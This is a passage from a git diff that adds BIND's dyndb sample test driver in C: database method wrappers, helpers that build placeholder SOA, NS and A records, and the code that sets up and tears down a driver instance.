dns_rdatatype_t type, unsigned int options, isc_stdtime_t now, + dns_dbnode_t **nodep, dns_name_t *foundname, dns_rdataset_t *rdataset, + dns_rdataset_t *sigrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_find(sampledb->rbtdb, name, version, type, options, now, + nodep, foundname, rdataset, sigrdataset)); +} + +static isc_result_t +findzonecut(dns_db_t *db, const dns_name_t *name, unsigned int options, + isc_stdtime_t now, dns_dbnode_t **nodep, dns_name_t *foundname, + dns_name_t *dcname, dns_rdataset_t *rdataset, + dns_rdataset_t *sigrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findzonecut(sampledb->rbtdb, name, options, now, nodep, + foundname, dcname, rdataset, sigrdataset)); +} + +static void +attachnode(dns_db_t *db, dns_dbnode_t *source, dns_dbnode_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_attachnode(sampledb->rbtdb, source, targetp); +} + +static void +detachnode(dns_db_t *db, dns_dbnode_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_detachnode(sampledb->rbtdb, targetp); +} + +static isc_result_t +expirenode(dns_db_t *db, dns_dbnode_t *node, isc_stdtime_t now) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_expirenode(sampledb->rbtdb, node, now)); +} + +static void +printnode(dns_db_t *db, dns_dbnode_t *node, FILE *out) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_printnode(sampledb->rbtdb, node, out); +} + +static isc_result_t +createiterator(dns_db_t *db, unsigned int options, + dns_dbiterator_t **iteratorp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_createiterator(sampledb->rbtdb, options, iteratorp)); +} + +static isc_result_t +findrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + dns_rdatatype_t type, dns_rdatatype_t covers, isc_stdtime_t now, + dns_rdataset_t *rdataset, dns_rdataset_t *sigrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findrdataset(sampledb->rbtdb, node, version, type, + covers, now, rdataset, sigrdataset)); +} + +static isc_result_t +allrdatasets(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + unsigned int options, isc_stdtime_t now, + dns_rdatasetiter_t **iteratorp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_allrdatasets(sampledb->rbtdb, node, version, options, + now, iteratorp)); +} + +static isc_result_t +addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + isc_stdtime_t now, dns_rdataset_t *rdataset, unsigned int options, + dns_rdataset_t *addedrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + isc_result_t result; + dns_fixedname_t name; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_fixedname_init(&name); + CHECK(dns_db_addrdataset(sampledb->rbtdb, node, version, now, rdataset, + options, addedrdataset)); + if (rdataset->type == dns_rdatatype_a || + rdataset->type == dns_rdatatype_aaaa) + { + CHECK(sample_name_fromnode(node, dns_fixedname_name(&name))); + CHECK(syncptrs(sampledb->inst, dns_fixedname_name(&name), + rdataset, DNS_DIFFOP_ADD)); + } + +cleanup: + return (result); +} + +static isc_result_t +subtractrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + dns_rdataset_t *rdataset, unsigned int options, + dns_rdataset_t *newrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + isc_result_t result; + dns_fixedname_t name; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_fixedname_init(&name); + result = dns_db_subtractrdataset(sampledb->rbtdb, node, version, + rdataset, options, newrdataset); + if (result != ISC_R_SUCCESS && result != DNS_R_NXRRSET) { + goto cleanup; + } + + if (rdataset->type == dns_rdatatype_a || + rdataset->type == dns_rdatatype_aaaa) + { + CHECK(sample_name_fromnode(node, dns_fixedname_name(&name))); + CHECK(syncptrs(sampledb->inst, dns_fixedname_name(&name), + rdataset, DNS_DIFFOP_DEL)); + } + +cleanup: + return (result); +} + +/* + * deleterdataset() function is not used during DNS update processing so syncptr + * implementation is left as an exercise to the reader. + */ +static isc_result_t +deleterdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version, + dns_rdatatype_t type, dns_rdatatype_t covers) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_deleterdataset(sampledb->rbtdb, node, version, type, + covers)); +} + +static bool +issecure(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_issecure(sampledb->rbtdb)); +} + +static unsigned int +nodecount(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_nodecount(sampledb->rbtdb)); +} + +/* + * The database does not need to be loaded from disk or written to disk. + * Always return true. + */ +static bool +ispersistent(dns_db_t *db) { + UNUSED(db); + + return (true); +} + +static void +overmem(dns_db_t *db, bool over) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_overmem(sampledb->rbtdb, over); +} + +static void +settask(dns_db_t *db, isc_task_t *task) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_settask(sampledb->rbtdb, task); +} + +static isc_result_t +getoriginnode(dns_db_t *db, dns_dbnode_t **nodep) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_getoriginnode(sampledb->rbtdb, nodep)); +} + +static void +transfernode(dns_db_t *db, dns_dbnode_t **sourcep, dns_dbnode_t **targetp) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_transfernode(sampledb->rbtdb, sourcep, targetp); +} + +static isc_result_t +getnsec3parameters(dns_db_t *db, dns_dbversion_t *version, dns_hash_t *hash, + uint8_t *flags, uint16_t *iterations, unsigned char *salt, + size_t *salt_length) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_getnsec3parameters(sampledb->rbtdb, version, hash, flags, + iterations, salt, salt_length)); +} + +static isc_result_t +findnsec3node(dns_db_t *db, const dns_name_t *name, bool create, + dns_dbnode_t **nodep) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findnsec3node(sampledb->rbtdb, name, create, nodep)); +} + +static isc_result_t +setsigningtime(dns_db_t *db, dns_rdataset_t *rdataset, isc_stdtime_t resign) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_setsigningtime(sampledb->rbtdb, rdataset, resign)); +} + +static isc_result_t +getsigningtime(dns_db_t *db, dns_rdataset_t *rdataset, dns_name_t *name) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_getsigningtime(sampledb->rbtdb, rdataset, name)); +} + +static void +resigned(dns_db_t *db, dns_rdataset_t *rdataset, dns_dbversion_t *version) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + dns_db_resigned(sampledb->rbtdb, rdataset, version); +} + +static bool +isdnssec(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_isdnssec(sampledb->rbtdb)); +} + +static dns_stats_t * +getrrsetstats(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_getrrsetstats(sampledb->rbtdb)); +} + +static isc_result_t +findnodeext(dns_db_t *db, const dns_name_t *name, bool create, + dns_clientinfomethods_t *methods, dns_clientinfo_t *clientinfo, + dns_dbnode_t **nodep) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findnodeext(sampledb->rbtdb, name, create, methods, + clientinfo, nodep)); +} + +static isc_result_t +findext(dns_db_t *db, const dns_name_t *name, dns_dbversion_t *version, + dns_rdatatype_t type, unsigned int options, isc_stdtime_t now, + dns_dbnode_t **nodep, dns_name_t *foundname, + dns_clientinfomethods_t *methods, dns_clientinfo_t *clientinfo, + dns_rdataset_t *rdataset, dns_rdataset_t *sigrdataset) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_findext(sampledb->rbtdb, name, version, type, options, + now, nodep, foundname, methods, clientinfo, + rdataset, sigrdataset)); +} + +static isc_result_t +setcachestats(dns_db_t *db, isc_stats_t *stats) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_setcachestats(sampledb->rbtdb, stats)); +} + +static size_t +hashsize(dns_db_t *db) { + sampledb_t *sampledb = (sampledb_t *)db; + + REQUIRE(VALID_SAMPLEDB(sampledb)); + + return (dns_db_hashsize(sampledb->rbtdb)); +} + +/* + * DB interface definition. Database driver uses this structure to + * determine which implementation of dns_db_*() function to call. + */ +static dns_dbmethods_t sampledb_methods = { + attach, + detach, + beginload, + endload, + serialize, + dump, + currentversion, + newversion, + attachversion, + closeversion, + findnode, + find, + findzonecut, + attachnode, + detachnode, + expirenode, + printnode, + createiterator, + findrdataset, + allrdatasets, + addrdataset, + subtractrdataset, + deleterdataset, + issecure, + nodecount, + ispersistent, + overmem, + settask, + getoriginnode, + transfernode, + getnsec3parameters, + findnsec3node, + setsigningtime, + getsigningtime, + resigned, + isdnssec, + getrrsetstats, + NULL, /* rpz_attach */ + NULL, /* rpz_ready */ + findnodeext, + findext, + setcachestats, + hashsize, + NULL, /* nodefullname */ + NULL, /* getsize */ + NULL, /* setservestalettl */ + NULL, /* getservestalettl */ + NULL, /* setservestalerefresh */ + NULL, /* getservestalerefresh */ + NULL, /* setgluecachestats */ + NULL /* adjusthashsize */ +}; + +/* Auxiliary driver functions. */ + +/* + * Auxiliary functions add_*() create minimal database which can be loaded. + * This is necessary because this driver create empty 'fake' zone which + * is not loaded from disk so there is no way for user to supply SOA, NS and A + * records. + * + * Following functions were copied from BIND 9.10.2rc1 named/server.c, + * credit goes to ISC. + */ +static isc_result_t +add_soa(dns_db_t *db, dns_dbversion_t *version, const dns_name_t *name, + const dns_name_t *origin, const dns_name_t *contact) { + dns_dbnode_t *node = NULL; + dns_rdata_t rdata = DNS_RDATA_INIT; + dns_rdatalist_t rdatalist; + dns_rdataset_t rdataset; + isc_result_t result; + unsigned char buf[DNS_SOA_BUFFERSIZE]; + + dns_rdataset_init(&rdataset); + dns_rdatalist_init(&rdatalist); + CHECK(dns_soa_buildrdata(origin, contact, dns_db_class(db), 0, 28800, + 7200, 604800, 86400, buf, &rdata)); + rdatalist.type = rdata.type; + rdatalist.covers = 0; + rdatalist.rdclass = rdata.rdclass; + rdatalist.ttl = 86400; + ISC_LIST_APPEND(rdatalist.rdata, &rdata, link); + CHECK(dns_rdatalist_tordataset(&rdatalist, &rdataset)); + CHECK(dns_db_findnode(db, name, true, &node)); + CHECK(dns_db_addrdataset(db, node, version, 0, &rdataset, 0, NULL)); +cleanup: + if (node != NULL) { + dns_db_detachnode(db, &node); + } + return (result); +} + +static isc_result_t +add_ns(dns_db_t *db, dns_dbversion_t *version, const dns_name_t *name, + const dns_name_t *nsname) { + dns_dbnode_t *node = NULL; + dns_rdata_ns_t ns; + dns_rdata_t rdata = DNS_RDATA_INIT; + dns_rdatalist_t rdatalist; + dns_rdataset_t rdataset; + isc_result_t result; + isc_buffer_t b; + unsigned char buf[DNS_NAME_MAXWIRE]; + + isc_buffer_init(&b, buf, sizeof(buf)); + + dns_rdataset_init(&rdataset); + dns_rdatalist_init(&rdatalist); + ns.common.rdtype = dns_rdatatype_ns; + ns.common.rdclass = dns_db_class(db); + ns.mctx = NULL; + dns_name_init(&ns.name, NULL); + dns_name_clone(nsname, &ns.name); + CHECK(dns_rdata_fromstruct(&rdata, dns_db_class(db), dns_rdatatype_ns, + &ns, &b)); + rdatalist.type = rdata.type; + rdatalist.covers = 0; + rdatalist.rdclass = rdata.rdclass; + rdatalist.ttl = 86400; + ISC_LIST_APPEND(rdatalist.rdata, &rdata, link); + CHECK(dns_rdatalist_tordataset(&rdatalist, &rdataset)); + CHECK(dns_db_findnode(db, name, true, &node)); + CHECK(dns_db_addrdataset(db, node, version, 0, &rdataset, 0, NULL)); +cleanup: + if (node != NULL) { + dns_db_detachnode(db, &node); + } + return (result); +} + +static isc_result_t +add_a(dns_db_t *db, dns_dbversion_t *version, const dns_name_t *name, + struct in_addr addr) { + dns_dbnode_t *node = NULL; + dns_rdata_in_a_t a; + dns_rdata_t rdata = DNS_RDATA_INIT; + dns_rdatalist_t rdatalist; + dns_rdataset_t rdataset; + isc_result_t result; + isc_buffer_t b; + unsigned char buf[DNS_NAME_MAXWIRE]; + + isc_buffer_init(&b, buf, sizeof(buf)); + + dns_rdataset_init(&rdataset); + dns_rdatalist_init(&rdatalist); + a.common.rdtype = dns_rdatatype_a; + a.common.rdclass = dns_db_class(db); + a.in_addr = addr; + CHECK(dns_rdata_fromstruct(&rdata, dns_db_class(db), dns_rdatatype_a, + &a, &b)); + rdatalist.type = rdata.type; + rdatalist.covers = 0; + rdatalist.rdclass = rdata.rdclass; + rdatalist.ttl = 86400; + ISC_LIST_APPEND(rdatalist.rdata, &rdata, link); + CHECK(dns_rdatalist_tordataset(&rdatalist, &rdataset)); + CHECK(dns_db_findnode(db, name, true, &node)); + CHECK(dns_db_addrdataset(db, node, version, 0, &rdataset, 0, NULL)); +cleanup: + if (node != NULL) { + dns_db_detachnode(db, &node); + } + return (result); +} + +/* + * Driver-specific implementation of dns_db_create(). + * + * @param[in] argv Database-specific parameters from dns_db_create(). + * @param[in] driverarg Driver-specific parameter from dns_db_register(). + */ +isc_result_t +create_db(isc_mem_t *mctx, const dns_name_t *origin, dns_dbtype_t type, + dns_rdataclass_t rdclass, unsigned int argc, char *argv[], + void *driverarg, dns_db_t **dbp) { + sampledb_t *sampledb = NULL; + isc_result_t result; + dns_dbversion_t *version = NULL; + struct in_addr a_addr; + + REQUIRE(type == dns_dbtype_zone); + REQUIRE(rdclass == dns_rdataclass_in); + REQUIRE(argc == 0); + REQUIRE(argv != NULL); + REQUIRE(driverarg != NULL); /* pointer to driver instance */ + REQUIRE(dbp != NULL && *dbp == NULL); + + UNUSED(driverarg); /* no driver-specific configuration */ + + a_addr.s_addr = 0x0100007fU; + + CHECKED_MEM_GET_PTR(mctx, sampledb); + ZERO_PTR(sampledb); + + isc_mem_attach(mctx, &sampledb->common.mctx); + dns_name_init(&sampledb->common.origin, NULL); + + sampledb->common.magic = DNS_DB_MAGIC; + sampledb->common.impmagic = SAMPLEDB_MAGIC; + + sampledb->common.methods = &sampledb_methods; + sampledb->common.attributes = 0; + sampledb->common.rdclass = rdclass; + + CHECK(dns_name_dupwithoffsets(origin, mctx, &sampledb->common.origin)); + + isc_refcount_init(&sampledb->refs, 1); + + /* Translate instance name to instance pointer. */ + sampledb->inst = driverarg; + + /* Create internal instance of RBT DB implementation from BIND. */ + CHECK(dns_db_create(mctx, "rbt", origin, dns_dbtype_zone, + dns_rdataclass_in, 0, NULL, &sampledb->rbtdb)); + + /* Create fake SOA, NS, and A records to make database loadable. */ + CHECK(dns_db_newversion(sampledb->rbtdb, &version)); + CHECK(add_soa(sampledb->rbtdb, version, origin, origin, origin)); + CHECK(add_ns(sampledb->rbtdb, version, origin, origin)); + CHECK(add_a(sampledb->rbtdb, version, origin, a_addr)); + dns_db_closeversion(sampledb->rbtdb, &version, true); + + *dbp = (dns_db_t *)sampledb; + + return (ISC_R_SUCCESS); + +cleanup: + if (sampledb != NULL) { + if (dns_name_dynamic(&sampledb->common.origin)) { + dns_name_free(&sampledb->common.origin, mctx); + } + + isc_mem_putanddetach(&sampledb->common.mctx, sampledb, + sizeof(*sampledb)); + } + + return (result); +} diff --git a/bin/tests/system/dyndb/driver/db.h b/bin/tests/system/dyndb/driver/db.h new file mode 100644 index 0000000..c520c8b --- /dev/null +++ b/bin/tests/system/dyndb/driver/db.h @@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) 2009-2015 Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/** + * Database API implementation. + */ + +#pragma once + +#include <isc/mem.h> +#include <isc/result.h> + +#include <dns/db.h> +#include <dns/name.h> +#include <dns/rdataclass.h> +#include <dns/rdatatype.h> + +isc_result_t +create_db(isc_mem_t *mctx, const dns_name_t *origin, dns_dbtype_t type, + dns_rdataclass_t rdclass, unsigned int argc, char *argv[], + void *driverarg, dns_db_t **dbp); diff --git a/bin/tests/system/dyndb/driver/driver.c b/bin/tests/system/dyndb/driver/driver.c new file mode 100644 index 0000000..51bcbd2 --- /dev/null +++ b/bin/tests/system/dyndb/driver/driver.c @@ -0,0 +1,179 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Driver API implementation and main entry point for BIND. + * + * BIND calls dyndb_version() before loading, dyndb_init() during startup + * and dyndb_destroy() during shutdown. + * + * It is completely up to implementation what to do. + * + * dyndb <name> <driver> {} sections in named.conf are independent so + * driver init() and destroy() functions are called independently for + * each section even if they reference the same driver/library. It is + * up to driver implementation to detect and catch this situation if + * it is undesirable. + */ + +#include <isc/commandline.h> +#include <isc/hash.h> +#include <isc/lib.h> +#include <isc/mem.h> +#include <isc/util.h> + +#include <dns/db.h> +#include <dns/dyndb.h> +#include <dns/lib.h> +#include <dns/types.h> + +#include "db.h" +#include "instance.h" +#include "log.h" +#include "util.h" + +dns_dyndb_destroy_t dyndb_destroy; +dns_dyndb_register_t dyndb_init; +dns_dyndb_version_t dyndb_version; + +/* + * Driver init is called for each dyndb section in named.conf + * once during startup and then again on every reload. + * + * @code + * dyndb example-name "sample.so" { param1 param2 }; + * @endcode + * + * @param[in] name User-defined string from dyndb "name" {}; definition + * in named.conf. + * The example above will have name = "example-name". + * @param[in] parameters User-defined parameters from dyndb section as one + * string. The example above will have + * params = "param1 param2"; + * @param[in] file The name of the file from which the parameters + * were read. + * @param[in] line The line number from which the parameters were read. + * @param[out] instp Pointer to instance-specific data + * (for one dyndb section). + */ +isc_result_t +dyndb_init(isc_mem_t *mctx, const char *name, const char *parameters, + const char *file, unsigned long line, const dns_dyndbctx_t *dctx, + void **instp) { + isc_result_t result; + unsigned int argc; + char **argv = NULL; + char *s = NULL; + sample_instance_t *sample_inst = NULL; + + REQUIRE(name != NULL); + REQUIRE(dctx != NULL); + + /* + * Depending on how dlopen() was called, we may not have + * access to named's global namespace, in which case we need + * to initialize libisc/libdns. We check this by comparing + * the value of isc_mem_debugging to the value passed via + * the context object. + */ + if (dctx->memdebug != &isc_mem_debugging) { + isc_lib_register(); + isc_log_setcontext(dctx->lctx); + dns_log_setcontext(dctx->lctx); + isc_hash_set_initializer(dctx->hashinit); + isc_mem_debugging = *(unsigned int *)dctx->memdebug; + } + + s = isc_mem_strdup(mctx, parameters); + + result = isc_commandline_strtoargv(mctx, s, &argc, &argv, 0); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "dyndb_init: isc_commandline_strtoargv -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + log_write(ISC_LOG_DEBUG(9), "loading params for dyndb '%s' from %s:%lu", + name, file, line); + + /* Finally, create the instance. */ + result = new_sample_instance(mctx, name, argc, argv, dctx, + &sample_inst); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "dyndb_init: new_sample_instance -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + /* + * This is an example so we create and load zones + * right now. This step can be arbitrarily postponed. + */ + result = load_sample_instance_zones(sample_inst); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "dyndb_init: load_sample_instance_zones -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + *instp = sample_inst; + +cleanup: + isc_mem_free(mctx, s); + if (argv != NULL) { + isc_mem_put(mctx, argv, argc * sizeof(*argv)); + } + + return (result); +} + +/* + * Driver destroy is called for every instance on every reload and then once + * during shutdown. + * + * @param[out] instp Pointer to instance-specific data (for one dyndb section). + */ +void +dyndb_destroy(void **instp) { + destroy_sample_instance((sample_instance_t **)instp); +} + +/* + * Driver version is called when loading the driver to ensure there + * is no API mismatch between the driver and the caller. + */ +int +dyndb_version(unsigned int *flags) { + UNUSED(flags); + + return (DNS_DYNDB_VERSION); +} diff --git a/bin/tests/system/dyndb/driver/instance.c b/bin/tests/system/dyndb/driver/instance.c new file mode 100644 index 0000000..9e90a2c --- /dev/null +++ b/bin/tests/system/dyndb/driver/instance.c @@ -0,0 +1,231 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) 2009-2015 Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Driver instance object. + * + * One instance is equivalent to dynamic-db section in named.conf. + * This module parses arguments and provide high-level operations + * instance init/zone load/instance destroy. + */ + +#include "instance.h" + +#include <isc/task.h> +#include <isc/util.h> + +#include <dns/db.h> +#include <dns/dyndb.h> +#include <dns/fixedname.h> +#include <dns/name.h> +#include <dns/view.h> +#include <dns/zone.h> + +#include "db.h" +#include "log.h" +#include "util.h" +#include "zone.h" + +/* + * Parse parameters and convert them to zone names. Caller has to deallocate + * resulting DNS names. + * + * @param[in] argv NULL-terminated string array of length 2 (excluding NULL) + * Each string has to be a valid DNS name. + * @param[out] z1 Zone name from argv[0] + * @param[out] z2 Zone name from argv[1] + */ +static isc_result_t +parse_params(isc_mem_t *mctx, int argc, char **argv, dns_name_t *z1, + dns_name_t *z2) { + isc_result_t result; + int i; + + REQUIRE(argv != NULL); + REQUIRE(z1 != NULL); + REQUIRE(z2 != NULL); + + for (i = 0; i < argc; i++) { + log_info("param: '%s'", argv[i]); + } + log_info("number of params: %d", i); + + if (argc != 2) { + log_error("exactly two parameters " + "(absolute zone names) are required"); + result = ISC_R_FAILURE; + goto cleanup; + } + result = dns_name_fromstring2(z1, argv[0], dns_rootname, 0, mctx); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "parse_params: dns_name_fromstring2 -> %s", + isc_result_totext(result)); + goto cleanup; + } + result = dns_name_fromstring2(z2, argv[1], dns_rootname, 0, mctx); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "parse_params: dns_name_fromstring2 -> %s", + isc_result_totext(result)); + goto cleanup; + } + + result = ISC_R_SUCCESS; + +cleanup: + return (result); +} + +/* + * Initialize new driver instance. It will not create zones until + * load_sample_instance_zones() is called. + */ +isc_result_t +new_sample_instance(isc_mem_t *mctx, const char *db_name, int argc, char **argv, + const dns_dyndbctx_t *dctx, + sample_instance_t **sample_instp) { + isc_result_t result; + sample_instance_t *inst = NULL; + + REQUIRE(sample_instp != NULL && *sample_instp == NULL); + + CHECKED_MEM_GET_PTR(mctx, inst); + ZERO_PTR(inst); + isc_mem_attach(mctx, &inst->mctx); + + inst->db_name = isc_mem_strdup(mctx, db_name); + + inst->zone1_name = dns_fixedname_initname(&inst->zone1_fn); + inst->zone2_name = dns_fixedname_initname(&inst->zone2_fn); + + result = parse_params(mctx, argc, argv, inst->zone1_name, + inst->zone2_name); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "new_sample_instance: parse_params -> %s", + isc_result_totext(result)); + goto cleanup; + } + + dns_view_attach(dctx->view, &inst->view); + dns_zonemgr_attach(dctx->zmgr, &inst->zmgr); + isc_task_attach(dctx->task, &inst->task); + + /* Register new DNS DB implementation. */ + result = dns_db_register(db_name, create_db, inst, mctx, &inst->db_imp); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "new_sample_instance: dns_db_register -> %s", + isc_result_totext(result)); + goto cleanup; + } + + *sample_instp = inst; + result = ISC_R_SUCCESS; + +cleanup: + if (result != ISC_R_SUCCESS) { + destroy_sample_instance(&inst); + } + return (result); +} + +/* + * Create empty zones, add fake SOA, NS, and A records, load fake zones + * and add them to inst->view. + */ +isc_result_t +load_sample_instance_zones(sample_instance_t *inst) { + isc_result_t result; + + result = create_zone(inst, inst->zone1_name, &inst->zone1); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "load_sample_instance_zones: create_zone -> %s", + isc_result_totext(result)); + goto cleanup; + } + result = activate_zone(inst, inst->zone1); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "load_sample_instance_zones: activate_zone -> %s", + isc_result_totext(result)); + goto cleanup; + } + + result = create_zone(inst, inst->zone2_name, &inst->zone2); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "load_sample_instance_zones: create_zone -> %s", + isc_result_totext(result)); + goto cleanup; + } + result = activate_zone(inst, inst->zone2); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "load_sample_instance_zones: activate_zone -> %s", + isc_result_totext(result)); + goto cleanup; + } + +cleanup: + return (result); +} + +void +destroy_sample_instance(sample_instance_t **instp) { + sample_instance_t *inst; + REQUIRE(instp != NULL); + + inst = *instp; + *instp = NULL; + if (inst == NULL) { + return; + } + + if (inst->db_name != NULL) { + isc_mem_free(inst->mctx, inst->db_name); + } + if (inst->zone1 != NULL) { + dns_zone_detach(&inst->zone1); + } + if (inst->zone2 != NULL) { + dns_zone_detach(&inst->zone2); + } + if (inst->db_imp != NULL) { + dns_db_unregister(&inst->db_imp); + } + + dns_view_detach(&inst->view); + dns_zonemgr_detach(&inst->zmgr); + isc_task_detach(&inst->task); + + MEM_PUT_AND_DETACH(inst); 